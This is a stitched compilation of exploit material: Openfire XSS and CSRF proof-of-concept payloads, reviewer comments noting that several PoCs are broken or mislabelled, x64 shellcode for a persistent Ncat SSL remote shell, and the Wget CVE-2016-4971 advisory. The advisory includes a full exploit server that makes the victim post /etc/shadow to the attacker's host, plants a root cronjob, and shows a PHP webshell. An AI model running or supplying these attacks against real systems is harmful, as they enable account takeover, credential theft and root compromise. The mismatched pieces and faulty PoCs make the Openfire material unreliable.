#### *subdomain* variable from *connection-settings-external-components.jsp*
The following curl command allows reproducing the attack against the Openfire *connection-settings-external-components.jsp* page:
```
curl --data "subdomain=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&secret=toto&componentAllowed=Add+Component" https://OpenFireServerIP:9090/connection-settings-external-components.jsp --cookie="JSESSIONID=XXX"
```
Or
```
curl --data "subdomain=%22%3Escript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&componentBlocked=Block+Component" https://OpenFireServerIP:9090/connection-settings-external-components.jsp --cookie="JSESSIONID=XXX"
```
#### *mucdesc* variable from *muc-service-edit-form.jsp*
The following curl command allows reproducing the attack against the Openfire *muc-service-edit-form.jsp* page:
```
curl --data "groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat" https://OpenFireServerIP:9090/plugins/bookmarks/create-bookmark.jsp --cookie="JSESSIONID=XXX"
```
#### *groupchatName*, *groupchatJID*, *users* and *groups* variables from page muc-service-edit-form.jsp
The following curl command allows reproducing the attack against the Openfire *muc-service-edit-form.jsp* page:
```
curl --data "groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat" https://OpenFireServerIP:9090/plugins/bookmarks/create-bookmark.jsp --cookie="JSESSIONID=XXX"
```
#### *searchname* variable from *plugins/search/search-props-edit-form.jsp*
The following curl command allows reproducing the attack against the Openfire *plugins/search/advance-user-search.jsp* page:
```
curl "http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search" --cookie="JSESSIONID=XXX"
```
The folling code allows exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp?save" method="post" target="xss-frame" >
<input type="text" name="searchEnabled" value="true" >
<input type="text" name="searchname" value="search%22/><script>alert('XSS')</script>" >
<input type="text" name="groupOnly" value="false" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
#### *propValue* variable from *server-properties.jsp*
The following curl command allows reproducing the attack against the Openfire *server-properties.jsp* page:
```
curl --data="propName=adminConsole.port&propValue=9090%22+onmouseover%3D%22alert%28%27xxs%27%29%22+x%3D%22&encrypt=false&save=Save+Property" http://OpenFireServerIP:9090/server-properties.jsp --cookie="JSESSIONID=XXX"
```
The folling code allows exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/server-properties.jsp" method="post" target="xss-frame" >
<input type="text" name="propValue" value="=adminConsole.port" >
<input type="text" name="searchname" value="9090%22 onmouseover=%22alert('XSS')%22 x="/>
<input type="text" name="encrypt" value="false" >
<input type="text" name="save" value="Save Property" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
###Affected versions
* Version 4.0.0 and 4.0.1
## Several CSRF Vulnerabilities identified in Openfire 3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-312
**CVSS Base Score**: 5.4
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several CSRF vulnerabilities have been found on different pages of the admin panel of the OpenFire web server. Throught this attack an attacker could drive a valid user to execute unwittingly a request on the OpenFire sever.
### Proof of Concept
#### *connection-settings-external-components.jsp* page is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *dwr/exec/downloader.installPlugin.dwr* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/dwr/exec/downloader.installPlugin.dwr" method="post" target="csrf-frame" >
<input type="text" name="callCount" value="1" >
<input type="text" name="c0-scriptName" value="downloader" >
<input type="text" name="c0-methodName" value="installPlugin" >
<input type="text" name="c0-id" value="9033_1444939787005" >
<input type="text" name="c0-param0" value="string:http://www.igniterealtime.org/projects/openfire/plugins/broadcast.jar" >
<input type="text" name="c0-param1" value="string:8221154" >
<input type="text" name="xml" value="true" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *client-connections-settings.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *client-connections-settings.jsp* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/client-connections-settings.jsp" method="post" target="csrf-frame" >
<input type="text" name="port" value="5222" >
<input type="text" name="sslEnabled" value="false" >
<input type="text" name="sslPort" value="5223" >
<input type="text" name="idleDisco" value="true" >
<input type="text" name="clientIdle" value="360" >
<input type="text" name="pingIdleClients" value="true" >
<input type="text" name="update" value="Save Settings" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *manage-updates.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the *Openfire manage-updates.jsp* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/manage-updates.jsp" method="post" target="csrf-frame" >
<input type="text" name="serviceEnabled" value="false" >
<input type="text" name="notificationsEnabled" value="false" >
<input type="text" name="proxyEnabled" value="true" >
<input type="text" name="proxyHost" value="10.0.0.1" >
<input type="text" name="proxyPort" value="6666" >
<input type="text" name="update" value="Save Settings" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *plugin-admin.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *plugin-admin.jsp* page.
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/plugin-admin.jsp" method="get" target="csrf-frame" >
<input type="text" name="deleteplugin" value="broadcast" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
The following HTML iframe command allows reproducing the attack against the Openfire *reg-settings.jsp* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/reg-settings.jsp" method="get" target="csrf-frame" >
<input type="text" name="inbandEnabled" value="false" >
<input type="text" name="canChangePassword" value="false" >
<input type="text" name="anonLogin" value="fasle" >
<input type="text" name="allowedIPs" value="0.0.0.0" >
<input type="text" name="allowedAnonymIPs" value="0.0.0.0" >
<input type="text" name="save" value="Save Settings" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *server-properties.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *server-properties.jsp* admin page.
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/server-properties.jsp" method="post" target="csrf-frame" >
<input type="text" name="propName" value="test" >
<input type="text" name="propValue" value="test" >
<input type="text" name="encrypt" value=""false >
<input type="text" name="save" value="Save Property" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *system-email.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *system-email.jsp* admin page.
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/system-email.jsp" method="post" target="csrf-frame" >
<input type="text" name="host" value="mail.google.com" >
<input type="text" name="port" value="25" >
<input type="text" name="debug" value="false" >
<input type="text" name="server_username" value="toto" >
<input type="text" name="server_password" value="toto" >
<input type="text" name="save" value="Save Changes" >
</form>
```
### Affected versions
* Version >= 3.10.2 and < 4.0.0
## Several CSRF Vulnerabilities identified in Openfire 3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-312
**CVSS Base Score**: 5.4
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several CSRF vulnerabilities have been found on different pages of the admin panel of the OpenFire web server. Through this attack, an attacker could drive a valid user to execute unwittingly a request to the OpenFire sever.
These vulnerabilities have already been found by hyp3rlinx, but had not been patched yet.
### Proof of Concept
#### *connection-settings-external-components.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *dwr/exec/downloader.installPlugin.dwr* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/user-create.jsp" method="get" target="csrf-frame" >
<input type="text" name="name" value="Evil" >
<input type="text" name="email" value="evil@evil.f" >
<input type="text" name="password" value="evil" >
<input type="text" name="passwordConfirm" value="evil" >
<input type="text" name="create" value="Create+User" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *client-connections-settings.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *client-connections-settings.jsp* page.
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/user-password.jsp" method="post" target="csrf-frame" >
<input type="text" name="username" value="victim" >
<input type="text" name="password" value="evil" >
<input type="text" name="passwordConfirm" value="evil" >
<input type="text" name="update" value="Update+Password" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
### Affected versions
* Version 4.0.0 and 4.0.1
## Sensitive information disclosure in OpenFire Server <=3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-200
**CVSS Base Score**: 5.5
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
A sensitive information disclosure vulnerabilty is present in the page *system-email.jsp*. It allow's an authenticated user to retreive the md5 hash the password of an email account.
### Vulnerable code
The following HTML code is reveived by an authenticated user on the page system-email.jsp. The md5 hash of the password is sent to the user.
```
<tr>
<td nowrap>
Server Username (Optional):
</td>
<td nowrap>
<input type="text" name="server_username" value="myusername" size="40" maxlength="150">
</td>
</tr>
<tr>
<td nowrap>
Server Password (Optional):
</td>
<td nowrap>
<input type="password" name="server_password" value="34819d7beeabb9260a5c854bc85b3e44" size="40" maxlength="150">
</td>
</tr>
```
### Affected versions
* Version >=3.10.2 and <4.0.2
### Fixes
* https://github.com/igniterealtime/Openfire/pull/570
### Solution
Update to version 4.0.2
### Timeline (dd/mm/yyyy)
* 15/10/2014 : Initial discovery
* 19/10/2015 : Contact with vendor team
* 27/11/2014 : vendor fixes vulnerabilities
* 27/11/2014 : vendor releases version 4.0.2, which includes the fixes
## Credits
* Florian Nivette <f.nivette@sysdream.com>
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream
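Review bot: the HTML PoC for the *propValue* XSS in *server-properties.jsp* does not post the fields that the curl command just above it sends: it has `name="propValue" value="=adminConsole.port"` and `name="searchname" value="9090%22 onmouseover=..."`, so the property name lands in `propValue` and the payload in a field that page does not read; the inputs should be `name="propName" value="adminConsole.port"` followed by `name="propValue"` carrying the payload, as in the curl request. Several other PoCs look copy-pasted rather than checked: the *mucdesc* section and the *groupchatName/groupchatJID/users/groups* section carry the identical `create-bookmark.jsp` curl command while both headings name *muc-service-edit-form.jsp*, so the mucdesc reproduction step is missing; in the second CSRF section the headings for *connection-settings-external-components.jsp* and *client-connections-settings.jsp* sit above forms that target `user-create.jsp` and `user-password.jsp`; the *server-properties.jsp* CSRF form has `value=""false` (broken quoting), the reg-settings form sends `anonLogin=fasle`, and the *system-email.jsp* CSRF form lacks the `<script>document.getElementById("csrf-form").submit()</script>` line every other PoC ends with, so it never submits on its own; the propValue curl uses `--data=` where every other command uses `--data "..."`. Note also that percent-escapes such as `%22` inside an HTML `value` attribute are sent literally by a browser form post (the `%` is itself encoded), so those HTML PoCs do not deliver the same bytes as the curl commands. Both CSRF sections cite CWE-312 (cleartext storage of sensitive information); the weakness class for cross-site request forgery is CWE-352. The timeline cannot be read in order (15/10/2014 discovery, 19/10/2015 vendor contact, 27/11/2014 fix and 4.0.2 release); the years need correcting.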


@ -0,0 +1,81 @@
#include <stdio.h>
#include <string.h>
// Exploit Title: [Linux 64bit Ncat + SSL + MultiChannel + Persistant + Fork + IPv4/6 + Password 176byte]
// Date: [7/5/2016]
// Exploit Author: [CripSlick]
// Tested on: [Kali 2.0]
// Version: [Ncat: Version 7.01]
// ShepherdDowling@gmail.com
// OffSec ID: OS-20614
// http://50.112.22.183/
//---------------------------------------------------------------------------------
// ALERT TO SETTINGS: If Fork is ON and MultiChannel is ON, you will need to either
// kill the PID or restart the computer in order to remove the RAT. That is why
// password and encryption is VERY important here.
//---------------------------------------------------------------------------------
// Default Use
// ncat --ssl -6 1000::66 9999 --proxy-auth creepin[:LaCrips] -v
// Any Use
// ncat --ssl -(4/6) (IPv4/IPv6) <port> --proxy-auth <username>[:<password>] -v
//---------------------------------------------------------------------------------
// Internet Protocol Version
// IPv6 = \x36
// IPv4 = \x34
#define IP "\x36"
// Username (Any Byte Size)
#define Username "\x63\x72\x65\x65\x70\x69\x6e"
// Password (Any Byte Size)
#define Password "\x4c\x61\xee\x43\x72\x69\x70\x73\x5d"
// Port (4 bytes)
// ascii (from 0 to 9) = 30, 31, 32, 33, 34, 35, 36, 37, 38, 39
#define Port "\x39\x39\x39\x39"
// MultiChannel & Non-Ceasing (persistant until terminal close unless Fork is on)
// on = \x6b
// off = \x76
#define MultiChannel "\x6b"
// Fork allows the program to run after terminal close (I suggest MultiChannel on)
// Fork helps when linking payload to an innocuous program
// comment the fork out if you don't want it
#define Fork "\x6a\x39\x58\x48\x31\xff\x0f\x05\x48\x31\xff\x48\x39\xf8\x74\x08\x48\x31\xc0\x6a\x3c\x58\x0f\x05"
unsigned char code[] =
"\x48\x31\xff\x48\xf7\xe7"Fork
"\x68\x2f\x6e\x63\x61\xc6\x44\x24\x04\x74\x48\xbf\x2f\x75\x73\x72\x2f\x62\x69\x6e\x57\x48\x89\xe7\x50\x68\x2d\x2d\x73\x73\xc6\x44\x24\x04\x6c\x49\x89\xe6\x50\x49\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x41\x57\x49\x89\xe7\x68\x2d"MultiChannel"\x76\x65\x49\x89\xe3\xeb\x3b\x48\x89\xe3\x68\x61\x75\x74\x68\x48\xb9\x2d\x2d\x70\x72\x6f\x78\x79\x2d\x51\x48\x89\xe1\x68"Port"\x49\x89\xe5\x68\x2d\x6c"IP"\x70\x49\x89\xe2\x50\x41\x56\x41\x57\x41\x53\x53\x51\x41\x55\x41\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05\xe8\xc0\xff\xff\xff"Username"\x5b\x3a"Password
;
int main ()
{
// I make sure there are no nulls
// The string count will terminate at the first \x00
printf("The Shellcode is %d Bytes Long\n", strlen(code));
// Next I throw 0xAAAAAAAA into every register before shellcode execution
// This ensures that the shellcode will run in any circumstance
__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t"
"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t"
"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t"
"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
"call code");
return 0;
}
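Review bot: the `Password` define does not match the documented default: the usage comment gives `ncat --ssl -6 1000::66 9999 --proxy-auth creepin[:LaCrips] -v`, but `"\x4c\x61\xee\x43\x72\x69\x70\x73\x5d"` decodes to `La<0xEE>Crips]`, so either the `\xee` byte is a typo or the documented credential is wrong; the two should agree, since a reader who tries the documented line will simply be refused. In the test harness, `printf("The Shellcode is %d Bytes Long\n", strlen(code))` passes a `size_t` to `%d` (use `%zu`), and the comment that filling the registers with 0xAA.. "ensures that the shellcode will run in any circumstance" is overstated: `call code` transfers control into a writable data array, so the program only runs when the binary is built with an executable data segment, which the header does not state; a build line belongs next to "Tested on". Spelling: "Persistant"/"persistant" should read "Persistent".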

platforms/linux/remote/40064.txt Executable file

@ -0,0 +1,495 @@
=============================================
- Release date: 06.07.2016
- Discovered by: Dawid Golunski
- Severity: High
- CVE-2016-4971
=============================================
I. VULNERABILITY
-------------------------
GNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution
II. BACKGROUND
-------------------------
"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and
FTP, the most widely-used Internet protocols.
It is a non-interactive commandline tool, so it may easily be called from
scripts, cron jobs, terminals without X-Windows support, etc.
GNU Wget has many features to make retrieving large files or mirroring entire
web or FTP sites easy
"
https://www.gnu.org/software/wget/
III. INTRODUCTION
-------------------------
GNU Wget before 1.18 when supplied with a malicious URL (to a malicious or
compromised web server) can be tricked into saving an arbitrary remote file
supplied by an attacker, with arbitrary contents and filename under
the current directory and possibly other directories by writing to .wgetrc.
Depending on the context in which wget is used, this can lead to remote code
execution and even root privilege escalation if wget is run via a root cronjob
as is often the case in many web application deployments.
The vulnerability could also be exploited by well-positioned attackers within
the network who are able to intercept/modify the network traffic.
IV. DESCRIPTION
-------------------------
Because of lack of sufficient controls in wget, when user downloads a file
with wget, such as:
wget http://attackers-server/safe_file.txt
an attacker who controls the server could make wget create an arbitrary file
with an arbitrary contents and filename by issuing a crafted HTTP 30X Redirect
containing FTP server reference in response to the victim's wget request.
For example, if the attacker's server replies with the following response:
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: ftp://attackers-server/.bash_profile
Content-Length: 262
Server: Apache
wget will automatically follow the redirect and will download a malicious
.bash_profile file from a malicious FTP server.
It will fail to rename the file to the originally requested filename of
'safe_file.txt' as it would normally do, in case of a redirect to another
HTTP resource with a different name.
Because of this vulnerability, an attacker is able to upload an arbitrary file
with an arbitrary filename to the victim's current directory.
Execution flow:
victim@trusty:~$ wget --version | head -n1
GNU Wget 1.17 built on linux-gnu.
victim@trusty:~$ pwd
/home/victim
victim@trusty:~$ ls
victim@trusty:~$
victim@trusty:~$ wget http://attackers-server/safe-file.txt
Resolving attackers-server... 192.168.57.1
Connecting to attackers-server|192.168.57.1|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: ftp://192.168.57.1/.bash_profile [following]
=> ‘.bash_profile’
Connecting to 192.168.57.1:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> SIZE .bash_profile ... 55
==> PASV ... done. ==> RETR .bash_profile ... done.
Length: 55 (unauthoritative)
.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s
2016-02-19 04:50:37 (1.27 MB/s) - ‘.bash_profile’ saved [55]
victim@trusty:~$ ls -l
total 4
-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile
victim@trusty:~$
This vulnerability will not work if extra options that force destination
filename are specified as a paramter. Such as: -O /tmp/output
It is however possible to exploit the issue with mirroring/recursive options
enabled such as -r or -m.
Another limitation is that attacker exploiting this vulnerability can only
upload his malicious file to the current directory from which wget was run,
or to a directory specified by -P option (directory_prefix option).
This could however be enough to exploit wget run from home directory, or
within web document root (in which case attacker could write malicious php files
or .bash_profile files).
The current directory limitation could also be bypassed by uploading a .wgetrc
config file if wget was run from a home directory.
By saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget
settings such as destination directory for all downloaded files in future,
as well as set a proxy setting to make future requests go through a malicious
proxy server belonging to the attackers to which they could send further
malicious responses.
Here is a set of Wget settings that can be helpful to an attacker:
dir_prefix = string
Top of directory tree—the same as ‘-P string’.
post_file = file
Use POST as the method for all HTTP requests and send the contents of file in the request body. The same as ‘--post-file=file’.
recursive = on/off
Recursive on/off—the same as ‘-r’.
timestamping = on/off
Allows to overwrite existing files.
cut_dirs = n
Ignore n remote directory components. Allows attacker to create directories with wget (when combined with recursive option).
http_proxy
HTTP Proxy server
https_proxy
HTTPS Proxy server
output_document = file
Set the output filename—the same as ‘-O file’.
input = file
Read the URLs from string, like ‘-i file’.
metalink-over-http
Issues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers.
Then it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download.
Full list of .wgetrc options can be found in:
https://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands
V. PROOF OF CONCEPT EXPLOIT
-------------------------
1) Cronjob with wget scenario
Often wget is used inside cronjobs. By default cronjobs run within home
directory of the cronjob owner.
Such wget cronjobs are commonly used with many applications used to download
new version of databases, requesting web scripts that perform scheduled tasks
such as rebuilding indexes, cleaning caches etc.
Here are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on
the Internet with exploitable wget cronjobs:
https://codex.wordpress.org/Post_to_your_blog_using_email
https://docs.moodle.org/2x/ca/Cron
http://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site
http://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel
Such setup could be abused by attackers to upload .bash_profile file through
wget vulnerability and run commands in the context of the victim user upon
their next log-in.
As cron runs priodically attackers, could also write out .wgetrc file in the
first response and then write to /etc/cron.d/malicious-cron in the second.
If a cronjob is run by root, this would give them an almost instant root code
execution.
It is worth noting that if an attacker had access to local network they could
potentially modify unencrypted HTTP traffic to inject malicious 30X Redirect
responses to wget requests.
This issue could also be exploited by attackers who have already gained
access to the server through a web vulnerability to escalate their privileges.
In many cases the cron jobs (as in examples above) are set up to request
various web scripts e.g:
http://localhost/clean-cache.php
If the file was writable by apache, and attacker had access to www-data/apache
account, they could modify it to return malicious Location header and exploit
root cronjob that runs the wget request in order to escalate their privileges
to root.
For simplicity we can assume that attacker already has control over the server
that the victim sends the request to with wget.
The root cronjob on the victim server may look as follows:
root@victim:~# cat /etc/cron.d/update-database
# Update database file every 2 minutes
*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1
In order to exploit this setup, attacker first prepares a malicious .wgetrc
and starts an FTP server:
attackers-server# mkdir /tmp/ftptest
attackers-server# cd /tmp/ftptest
attackers-server# cat <<_EOF_>.wgetrc
post_file = /etc/shadow
output_document = /etc/cron.d/wget-root-shell
_EOF_
attackers-server# sudo pip install pyftpdlib
attackers-server# python -m pyftpdlib -p21 -w
At this point attacker can start an HTTP server which will exploit wget by
sending malicious redirects to the victim wget's requests:
---[ wget-exploit.py ]---
#!/usr/bin/env python
#
# Wget 1.18 < Arbitrary File Upload Exploit
# Dawid Golunski
# dawid( at )legalhackers.com
#
# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
#
# CVE-2016-4971
#
import SimpleHTTPServer
import SocketServer
import socket;
class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# This takes care of sending .wgetrc
print "We have a volunteer requesting " + self.path + " by GET :)\n"
if "Wget" not in self.headers.getheader('User-Agent'):
print "But it's not a Wget :( \n"
self.send_response(200)
self.end_headers()
self.wfile.write("Nothing to see here...")
return
print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
self.send_response(301)
new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )
print "Sending redirect to %s \n"%(new_path)
self.send_header('Location', new_path)
self.end_headers()
def do_POST(self):
# In here we will receive extracted file and install a PoC cronjob
print "We have a volunteer requesting " + self.path + " by POST :)\n"
if "Wget" not in self.headers.getheader('User-Agent'):
print "But it's not a Wget :( \n"
self.send_response(200)
self.end_headers()
self.wfile.write("Nothing to see here...")
return
content_len = int(self.headers.getheader('content-length', 0))
post_body = self.rfile.read(content_len)
print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)
print "Sending back a cronjob script as a thank-you for the file..."
print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(ROOT_CRON)
print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"
return
HTTP_LISTEN_IP = '192.168.57.1'
HTTP_LISTEN_PORT = 80
FTP_HOST = '192.168.57.1'
FTP_PORT = 21
ROOT_CRON = "* * * * * root /usr/bin/id > /root/hacked-via-wget \n"
handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
print "Ready? Is your FTP server running?"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:
print "FTP is down :( Exiting."
exit(1)
print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT
handler.serve_forever()
---[ eof ]---
Attacker can run wget-exploit.py and wait a few minutes until the victim's server executes
the aforementioned cronjob with wget.
The output should look similar to:
---[ wget-exploit.py output ]---
attackers-server# python ./wget-exploit.py
Ready? Is your FTP server running?
FTP found open on 192.168.57.1:21. Let's go then
Serving wget exploit on port 80...
We have a volunteer requesting /database.db by GET :)
Uploading .wgetrc via ftp redirect vuln. It should land in /root
192.168.57.10 - - [26/Feb/2016 15:03:54] "GET /database.db HTTP/1.1" 301 -
Sending redirect to ftp://anonymous@192.168.57.1:21/.wgetrc
We have a volunteer requesting /database.db by POST :)
Received POST from wget, this should be the extracted /etc/shadow file:
---[begin]---
root:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7:::
daemon:*:16484:0:99999:7:::
bin:*:16484:0:99999:7:::
sys:*:16484:0:99999:7:::
sync:*:16484:0:99999:7:::
games:*:16484:0:99999:7:::
man:*:16484:0:99999:7:::
lp:*:16484:0:99999:7:::
...cut...
---[eof]---
Sending back a cronjob script as a thank-you for the file...
It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)
192.168.57.10 - - [26/Feb/2016 15:05:54] "POST /database.db HTTP/1.1" 200 -
File was served. Check on /root/hacked-via-wget on the victim's host in a minute! :)
---[ output eof ]---
As we can see .wgetrc got uploaded by the exploit. It has set the post_file
setting to /etc/shadow.
Therefore, on the next wget run, wget sent back shadow file to the attacker.
It also saved the malicious cronjob script (ROOT_CRON variable) which should
create a file named /root/hacked-via-wget, which we can verify on the victim's
server:
root@victim:~# cat /etc/cron.d/wget-root-shell
* * * * * root /usr/bin/id > /root/hacked-via-wget
root@victim:~# cat /root/hacked-via-wget
uid=0(root) gid=0(root) groups=0(root)
2) PHP web application scenario
If wget is used within a PHP script e.g.:
<?php
// Update geoip data
system("wget -N -P geoip http://attackers-host/goeip.db");
?>
An attacker who manages to respond to the request could simply upload a PHP
backdoor of:
<?php
//webshell.php
system($_GET['cmd']);
?>
by using the wget-exploit script described in example 1.
After the upload he could simply execute the script and their shell
command by a GET request to:
http://victims-php-host/geoip/webshell.php?cmd=id
VI. BUSINESS IMPACT
-------------------------
Affected versions of wget that connect to untrusted (or compromised) web
servers could be tricked into uploading a file under an arbitrary name, or
even path (if wget is run from a home directory).
Depending on the context in which wget is used, this could lead to
uploading a web shell and granting the attacker access remote access to the
system, or privilege escalation. It could be possible for attackers to escalate
to root user if wget is run via root cronjob as it is often the case in web
application deployments and is recommended in some guides on the Internet.
The vulnerability could also be exploited by well-positioned attackers within
the networ who are able to intercept/modify the network traffic.
VII. SYSTEMS AFFECTED
-------------------------
All versions of Wget before the patched version of 1.18 are affected.
VIII. SOLUTION
-------------------------
Update to wget version 1.18 as advertised by the vendor at:
http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html
Linux distributions should update their wget packages. It is recommended
to update wget manually if an updated package is not available for your
distribution.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html
http://www.ubuntu.com/usn/usn-3012-1/
https://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
06.07.2016 - Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
